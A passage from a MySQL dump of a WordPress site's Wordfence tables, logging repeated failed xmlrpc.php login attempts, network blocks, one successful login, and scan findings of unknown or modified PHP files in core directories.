Firefox/62.0','loginFailValidUsername',NULL,NULL),(7306,0.000000,1629846992.012174,'\0\0\0\0\0\0\0\0\0\0���3�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7307,0.000000,1629847325.770633,'\0\0\0\0\0\0\0\0\0\0��C͘',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7308,0.000000,1629847656.108597,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7309,0.000000,1629848023.082637,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7310,0.000000,1629848375.124752,'\0\0\0\0\0\0\0\0\0\0��g��R',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7311,0.000000,1629848746.115684,'\0\0\0\0\0\0\0\0\0\0��-��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7312,0.000000,1629849101.606134,'\0\0\0\0\0\0\0\0\0\0��gV�]',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7313,0.000000,1629849456.991773,'\0\0\0\0\0\0\0\0\0\0���\0�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7314,0.000000,1629849832.129321,'\0\0\0\0\0\0\0\0\0\0���֣%',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7315,0.000000,1629850185.141069,'\0\0\0\0\0\0\0\0\0\0��?�)',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7316,0.000000,1629850527.042943,'\0\0\0\0\0\0\0\0\0\0����kQ',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7317,0.000000,1629850918.969441,'\0\0\0\0\0\0\0\0\0\0��N�$b',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7318,0.000000,1629851294.981749,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7319,0.000000,1629851636.955656,'\0\0\0\0\0\0\0\0\0\0��}:w�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7320,0.000000,1629852023.824490,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7321,0.000000,1629852390.301990,'\0\0\0\0\0\0\0\0\0\0��@Z0�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7322,0.000000,1629852751.746611,'\0\0\0\0\0\0\0\0\0\0���\n5	',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7323,0.000000,1629853500.955282,'\0\0\0\0\0\0\0\0\0\0���֖]',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7324,0.000000,1629853858.737360,'\0\0\0\0\0\0\0\0\0\0����O�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7325,0.000000,1629854262.624234,'\0\0\0\0\0\0\0\0\0\0���KG�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7326,0.000000,1629854644.821305,'\0\0\0\0\0\0\0\0\0\0��Kw��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7327,0.000000,1629855031.242230,'\0\0\0\0\0\0\0\0\0\0���˰R',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7328,0.000000,1629855418.087524,'\0\0\0\0\0\0\0\0\0\0��/J�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7329,0.000000,1629855801.664925,'\0\0\0\0\0\0\0\0\0\0���[h�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7330,0.000000,1629856188.019531,'\0\0\0\0\0\0\0\0\0\0��j)�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7331,0.000000,1629856586.233529,'\0\0\0\0\0\0\0\0\0\0��k���',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7332,0.000000,1629856980.372733,'\0\0\0\0\0\0\0\0\0\0����8',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7333,0.000000,1629857379.840248,'\0\0\0\0\0\0\0\0\0\0���Dc�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7334,0.000000,1629857766.235597,'\0\0\0\0\0\0\0\0\0\0��}��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7335,0.000000,1629858540.370083,'\0\0\0\0\0\0\0\0\0\0��ψ.',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7336,0.000000,1629858960.035237,'\0\0\0\0\0\0\0\0\0\0��O���',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7337,0.000000,1629859352.281909,'\0\0\0\0\0\0\0\0\0\0���\0�D',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7338,0.000000,1629859722.078113,'\0\0\0\0\0\0\0\0\0\0���Q֨',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7339,0.000000,1629860151.206164,'\0\0\0\0\0\0\0\0\0\0��>��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7340,0.000000,1629860516.015277,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7341,0.000000,1629860972.862509,'\0\0\0\0\0\0\0\0\0\0���1T&',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7342,0.000000,1629861362.607715,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7343,0.000000,1629861767.562110,'\0\0\0\0\0\0\0\0\0\0���Dt',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7344,0.000000,1629862178.348470,'\0\0\0\0\0\0\0\0\0\0��B��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7345,0.000000,1629862577.916945,'\0\0\0\0\0\0\0\0\0\0��^+.',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7346,0.000000,1629862974.443359,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7347,0.000000,1629863382.087349,'\0\0\0\0\0\0\0\0\0\0��4�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7348,0.000000,1629863765.247792,'\0\0\0\0\0\0\0\0\0\0���5�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7349,0.000000,1629864195.962011,'\0\0\0\0\0\0\0\0\0\0���Z�_',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7350,0.000000,1629864601.114593,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7351,0.000000,1629865027.062293,'\0\0\0\0\0\0\0\0\0\0��Kw�\r',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7352,0.000000,1629865414.111431,'\0\0\0\0\0\0\0\0\0\0���@vs',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7353,0.000000,1629865829.174933,'\0\0\0\0\0\0\0\0\0\0��2tb',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7354,0.000000,1629866277.116067,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7355,0.000000,1629866719.122360,'\0\0\0\0\0\0\0\0\0\0���[h�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7356,0.000000,1629867416.257379,'\0\0\0\0\0\0\0\0\0\0��}��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7357,0.000000,1629867677.311766,'\0\0\0\0\0\0\0\0\0\0����PZ',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7358,0.000000,1629867964.151781,'\0\0\0\0\0\0\0\0\0\0��-w��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7359,0.000000,1629868173.172529,'\0\0\0\0\0\0\0\0\0\0����P�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7360,0.000000,1629868399.957481,'\0\0\0\0\0\0\0\0\0\0��\\��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7361,0.000000,1629868627.039151,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7362,0.000000,1629868827.320037,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7363,0.000000,1629869056.830789,'\0\0\0\0\0\0\0\0\0\0����I',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7364,0.000000,1629869262.145038,'\0\0\0\0\0\0\0\0\0\0��U���',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7365,0.000000,1629869475.417775,'\0\0\0\0\0\0\0\0\0\0��E��x',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7366,0.000000,1629870990.328713,'\0\0\0\0\0\0\0\0\0\0��2M_',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7367,0.000000,1629871181.093912,'\0\0\0\0\0\0\0\0\0\0���A�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7368,0.000000,1629871381.654554,'\0\0\0\0\0\0\0\0\0\0���]��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7369,0.000000,1629871606.051916,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7370,0.000000,1629871797.320098,'\0\0\0\0\0\0\0\0\0\0��}�9',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7371,0.000000,1629872007.771031,'\0\0\0\0\0\0\0\0\0\0��\"^��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7372,0.000000,1629872145.858302,'\0\0\0\0\0\0\0\0\0\0��gF�~',0,302,0,1,0,'https://www.equalitywalk.org.uk/wp-login.php','https://www.equalitywalk.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.equalitywalk.org.uk%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0','loginOK',NULL,NULL);
/*!40000 ALTER TABLE `wp_wfhits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfhoover`
--

DROP TABLE IF EXISTS `wp_wfhoover`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhoover` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `owner` text DEFAULT NULL,
  `host` text DEFAULT NULL,
  `path` text DEFAULT NULL,
  `hostKey` varbinary(124) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k2` (`hostKey`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfhoover`
--

LOCK TABLES `wp_wfhoover` WRITE;
/*!40000 ALTER TABLE `wp_wfhoover` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfhoover` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfissues`
--

DROP TABLE IF EXISTS `wp_wfissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB AUTO_INCREMENT=2321 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfissues`
--

LOCK TABLES `wp_wfissues` WRITE;
/*!40000 ALTER TABLE `wp_wfissues` DISABLE KEYS */;
INSERT INTO `wp_wfissues` VALUES (2202,1629633193,1629633193,'new','knownfile',75,'c8987f0256733dc47fc44c28ef0b6991','bf866116618d69a75cb9418322d4ee1f','Unknown file in WordPress core: wp-admin/css/colors/ectoplasm/0.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-admin/css/colors/ectoplasm/0.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(2203,1629633195,1629633195,'new','knownfile',75,'709472fb98bc32851c46bb4aa85d0c4c','73cf7024f38fcffc061ab0632362831a','Unknown file in WordPress core: wp-admin/css/index.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:22:\"wp-admin/css/index.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(2204,1629633401,1629633401,'new','knownfile',75,'e09b39c3909b7826816a90fbe5868c51','2a89abc54faf4f0f33a20bae61cc45cf','Unknown file in WordPress core: wp-includes/class.wp-includes.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/class.wp-includes.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(2205,1629633427,1629633427,'new','knownfile',75,'bc0e1e98251a9ecbbbfd1638b3a60bff','44c9694bf8fafec3d3d15c94a2499d1e','Unknown file in WordPress core: wp-includes/pomo/pomo/entry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:31:\"wp-includes/pomo/pomo/entry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(2206,1629633427,1629633427,'new','knownfile',75,'f0ca8859087c27712491046669d9090e','620c3ffdf68920e27a7834b774547252','Unknown file in WordPress core: wp-includes/pomo/pomo/mo.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:28:\"wp-includes/pomo/pomo/mo.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(2207,1629633427,1629633427,'new','knownfile',75,'6c0d45deb56eb69f4100ab72b98d18a2','d11b3440081ddccd55bfdf2cc2a11901','Unknown file in WordPress core: wp-includes/pomo/pomo/plural-forms.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/pomo/pomo/plural-forms.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(2208,1629633427,1629633427,'new','knownfile',75,'66fc81b51e18fb67e3ff8b11bd378ebe','a7b1d80a7b7c9a37dd357357f80720d4','Unknown file in WordPress core: wp-includes/pomo/pomo/po.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:28:\"wp-includes/pomo/pomo/po.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(2209,1629633427,1629633427,'new','knownfile',75,'54b1379f429ead0b05c5679d25ddfe92','483fe8d0dc2f62591bc8c2efc2190bd8','Unknown file in WordPress core: wp-includes/pomo/pomo/streams.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/pomo/pomo/streams.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(2210,1629633428,1629633428,'new','knownfile',75,'64bac185b3e6cab863ec6f49ca6a61e3','baaf322ae29febdddecae999f621ac77','Unknown file in WordPress core: wp-includes/pomo/pomo/translations.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/pomo/pomo/translations.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(2211,1629633435,1629633435,'new','knownfile',75,'2d8d8fdae0f3b4d928cf66463a190130','e464f21615bce64989e4c6a2291f9e25','WordPress core file modified: wp-includes/vars.php','This WordPress core file has been modified and differs from the original file distributed with this version of 